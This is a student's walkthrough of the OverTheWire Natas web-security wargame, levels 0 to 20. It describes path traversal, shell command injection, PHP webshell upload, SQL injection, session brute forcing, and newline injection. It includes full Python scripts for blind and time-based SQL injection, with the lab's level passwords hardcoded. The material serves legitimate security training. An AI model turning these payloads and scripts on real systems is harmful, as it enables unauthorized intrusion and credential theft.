Natas - Walkthrough

SNP - IE2012

G.D.I.Bomal - IT22032188

00/00/2023
The password to access Natas0 is given on the website itself.

Natas 0:
For this level to obtain the password all you need to do is inspect the webpage by
right-clicking anywhere on the screen, then extend the tags, and the password is given as a
comment.
Natas 1:
For this level right-clicking has been blocked.

So in order to access the inspect menu all you need to do is use the keyboard.
Press Ctrl + Shift + I to access the inspect menu without right-clicking and expand the tags,
the password will be given as a comment
Natas 2:
For this level, we can right-click again but there is no commented password, instead, there is
an image with the src of “files/pixel.png”

To get the password we need to access the “files” directory

Then we can open the users.txt file and get the password
Natas 3:
In this level there is a comment saying “No more information leaks!! Not even Google will
find it this time…”, suggesting that the data has been hidden from Google.

This is where the “robots.txt” file comes in, the robots.txt file is a file used to manage crawler
traffic to the site, and also to keep some files off Google.

To see these files we just need to add the file path “/robots.txt” to the end of the URL of the
natas3 page

Here we can see a file is hidden from Google, so let's put that at the end of the URL now
(replace the /robots.txt with /s3cr3t/)

Now access the users.txt and get the password for the next level.
Natas 4:
To get the password for this level we need to visit the website from the natas5 link, to do this
we can use the Firefox browser or the burp suite software (need to create an account).

I used the Burp method:

First, we open the burp app, go to the proxy option, and open the browser and refresh the
page until it gives the full text
Then turn on intercept in the burp app and refresh the page again to get the referrer into the
burp app

Now right-click it and click “send to repeater”, then go to the repeater option and change the
referer to the given link in the natas4 webpage and click send, then scroll down in the
responses section to get the password for natas5
Natas 5:
For this level, it says that we are not logged in. so all we need to do is change the cookies in
the inspect menu

We change the “Value” from 0 to 1 and refresh the page.

Natas 6:
In this level we see that we have to enter a secret code, and we can view the source code.
When we view the source code we see that there is a file included:

To access the file we can simply add “/includes/secret.inc” to the end of the natas6 URL
We get the following page:

We can copy and paste this code into the natas6 webpage and get the password for natas7
Natas 7:
In this level, we can see 2 buttons, home and about. The buttons don't necessarily do
anything so we go to the inspect menu and see that they have said “hint: password for
webuser natas8 is in /etc/natas_webpass/natas8”

Now lets click any of the buttons and edit the URL.
Change the URL from
“http://natas7.natas.labs.overthewire.org/index.php?page=<home/about>” to
“http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8” and
you should get the password
Natas 8:
In this level, they have encrypted the password and given it.
The encryptions are base64, strrev and bin2hex (base64 encryption, string reverse, and
binary to hex) so let's decrypt it
starting with bin2hex:

Next is string reverse:

And finally is base64:

Then we enter that code into the natas8 website and get the password:
Natas 9:
For this level to get the password we have to inject Linux commands into the search bar
given on the website.
To do this we need to wrap the Linux command within semi-colons.
We can uset the cat command to get the password using the /etc/natas_webpass/natas10
directory
Natas 10:
In this level, we can no longer inject linux commands to find the password exactly.
However, since they pass the search through the “grep -i” function we can get a case
insensitive search so all we need to do is put in any letter (upper or lower case) and enter
the /etc/natas_webpass/natas11 along with it like so:

a /etc/natas_webpass/natas11

Since the password has the letter ‘A’ in it and since the search is case insensitive the
password appeared.
Natas 11:
In this level, we have to go through a long decryption process to get the password.
First let's start with the basic steps:
1. Go to the cookies section and find the “data” cookie, make sure its URL decoded,
and copy it
2. We can take that and decrypt it using a base64 decoder
3. Now that will be out cypher text for the XOR decryption
4. To get the plain text, we will have to JSON encode the default data variable in the
source code
5. Finally we use our cypher text and the plain text we got to get the key for the next
decryption

6. Now that we have the Key (KNHL) we can go to the cyber chef website and start
decoding/encoding to get the new cookie
7. 1st we enter the plain text into the input field, then select the XOR recipe and enter
the “Key” under UTF8 and bake to get a new string
8. Next put the output into the input field and change the recipe to a base64 encoder
like so and bake, the result is the new cookie:

9. Finally, we take that output and replace the value of the data cookie in the natas11
website with the new output and refresh the page
Natas 12:
For this level, we have to upload something. And in the source code, we can try to upload a
.php file to get the password.
First, let's make a .php file with any file name and the extension of .php and lets write this in
it

Now we once again need burp suite to intercept the request and change the uploaded
extension from .jpg to .php again
Load up burp and go to proxy, open up their browser and login to natas12, and SELECT the
.php file there
Before uploading, turn intercept on in burp suite and then upload the file
Then right-click on the burp suite app and click send to repeater
Then change the extension of the file name from .jpg to .php

Now click send and check the responses,

around line 22 there should be a directory like this
Copy that “upload/ug66qepr64.php” directory and paste it in ur search bar next to the original
URL of the natas12 site like so (you will have to add some extra commands to get the
password as shown below)

That is the password or natas13

Natas 13:
This level is similar to the previous one, however, we can only upload jpg files
We have to do the same thing again but slightly different
1. First we select a random jpg file and turn intercept on and upload it
2. Now in burp suite, right click and sent to repeater
3. In the repeater you should see some garbage characters at the end, leave a few
lines (preferebly 4 or 5) and write ur php code to get the password (same as before
but for natas14)
4. Then like before, change the extension to .php but also change the content type to:
application/php
5. It should look like this:

6. Now click send and copy the directory given in the response section
7. And paste it after the URL with the same command you used in level 12 like so and
you will get the password

8. Copy the password given in the end and move on to the next level
Natas 14:
For this level, we can bypass the username and password checks by entering an “always
true” statement
Junk” OR 1=1# is an always true statement
The # is used so that MySQL ignores everything after it and only executes whatever is
before it
Natas 15:
For this level, we have to do a blind-based SQL injection to leak out the password using a
Python program

We need to create a Python program to loop through all the possible characters that could
be part of the password

import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits
characters = ascii_lowercase + ascii_uppercase + digits
# print(characters)

username = 'natas15'
password = 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB'
url = 'http://%s.natas.labs.overthewire.org/' % username

session = requests.Session()
seen_password = list('')
done = False
while(not done):
for ch in characters:
#print("trying", "".join(seen_password) + ch)
response = session.post(url, data={"username": 'natas16" AND
BINARY password LIKE "' + "".join(seen_password) + ch + '%" #'},
auth=(username, password))
content = response.text
if ('user exists' in content):
seen_password.append(ch)
break
print("trying", "".join(seen_password) + ch)
if len(seen_password) == 32:
done=True

Run that code and wait and the password will generate slowly
Natas 16:
For this level, we have the $key variable which will check the characters to see whether it is
in the blacklist or not, the command will run only if the character is not in the blacklist

grep uses regular expressions, so we should use special characters like ^ (caret) that show
the starting character of the string.

Imagine ^a. If the letter a is the very first thing in the text, we won't see any results. To know
if something is right, we check if nothing shows up. So, we'll make a list and add the letters
that don't show up.

Again we need to use a python code to leak the password for natas17
This time we have changed the code a bit to this:
import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits
characters = ascii_lowercase + ascii_uppercase + digits
# print(characters)

username = 'natas16'
password = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'
url = 'http://%s.natas.labs.overthewire.org/' % username

session = requests.Session()
seen_password = list('')
done = False
while(not done):
for ch in characters:
#print("trying", "".join(seen_password) + ch)
response = session.post(url, data={"needle": "anythings$(grep
^" + "".join(seen_password) + ch + " /etc/natas_webpass/natas17)"},
auth=(username, password))
content = response.text
itreturned = re.findall('<pre>\n(.*)\n</pre>', content)
if (not itreturned):
seen_password.append(ch)
print("tyring", "".join(seen_password) + ch)
break
if len(seen_password) == 32:
done = True

Run it and it will slowly generate the password

Natas 17:
Here we can no longer use the blind SQL attack as it has commented out the output that
shows if there is a user or not

To overcome this issue we will use the sleep function. So whenever a character is in the
password the query will sleep for a second and we can use that to calculate the time
differences and if the time difference is greater than expected, then it means that the
character exists in the password

import requests

# Define the length of the password

pwd_len = 32

# Define character sets for searching and building the password

charset_0 = (
'0123456789' +
'abcdefghijklmnopqrstuvwxyz' +
'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
)
charset_1 = ''

# Define the target URL and authentication credentials

target = 'http://natas17.natas.labs.overthewire.org'
auth = ('natas17', 'XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd')
sleep_time = 15

# Iterate through characters in charset_0 to find characters that exist

in the password
for c in charset_0:
# Construct a username payload to check if a character exists in
the password
username = 'natas18" AND IF(password LIKE BINARY
"%%%c%%",SLEEP(%d), 1)#' % (c, sleep_time)

# Send a GET request to the target with the payload

r = requests.get(target, auth=auth, params={"username": username})

# Measure the time elapsed in seconds for the response

s = r.elapsed.total_seconds()
 # If the response time is greater than or equal to sleep_time, the
character exists
if s >= sleep_time:
charset_1 += c
print('C: ' + charset_1.ljust(len(charset_0), '*'))

print("")

# Initialize an empty password

password = ""

# Iterate to build the password character by character

while len(password) != pwd_len:
for c in charset_1:
# Combine the current password with the character
t = password + c

# Construct a username payload to check if a substring of the

password exists
username = 'natas18" AND IF(password LIKE BINARY
"%s%%",SLEEP(%d), 1)#' % (t, sleep_time)

# Send a GET request to the target with the payload

r = requests.get(target, auth=auth, params={"username":
username})

# Measure the time elapsed in seconds for the response

s = r.elapsed.total_seconds()

# If the response time is greater than or equal to sleep_time,

the character is correct
if s >= sleep_time:
print('P: ' + t.ljust(pwd_len, '*'))
password = t
break
Natas 18:
For this level, we are supposed to login with the admin account, and by looking at the source
code we can deduce that there has to be 1 session ID that is for the admin

We also see that there is a maxid variable set to 640 so there are only 640 IDs to go through
Now that we know this, we can start up burp suite and do the following steps
1. First open up the browser from burp and login to natas18
2. Now turn on intercept and login without credentials and we should see a ine that
shows PHPSESSID and a value, if that is there then we continue

3. Now we right-click and click send to intruder

4. In the intruder menu we highlight the value of PHPSESSID and click add
5. Then set the attack type to sniper

6. Now we go to the payloads tab and enter the details as follows

 We can set the from and to values to 1 and 640 respectively but this was just the way
I did it
7. Next we go to the settings menu go to grep-extract and click add
8. In the popped up menu we make the following changes and click fetch response
9. Then highlight the line as shown and click ok

10. Now we can just click start attack and wait until we see an entry were we logged in
as an admin, click it, go to the responses tab and scroll and you should find the
password
Natas 19:
In this level, its the same code as last time but this time the SessionIDs are no longer
sequential
So lets try the same thing again but this time we get a different PHPSESSID, im assuming
they have encrypted it

Let's send it to the decoder and see

Lets assume the username is admin and try to find the password by using the intercept
again with the same settings as before but this time we can remove the grep-extract and
ass a payload processing
Now we can start the attack and monitor the length to find the unique one

AND WE GOT THE PASSWORD!

Natas 20:
For this level what we should do is inject the name “admin” into it and make sure its true

First let’s open up burp and open the browser

Now let’s enter admin as the name, turn on intercept, and then click change name

Now we can right-click in burp and sent to repeater

In repeater we should change the following:

1. PHPSESSID
2. name

Change the PHPSESSID to anything of your preference (i put my name)

Change the name to the following:
<random string>%0Aadmin 1
(my <random string> was whatever)

GOT THE PASSWORD!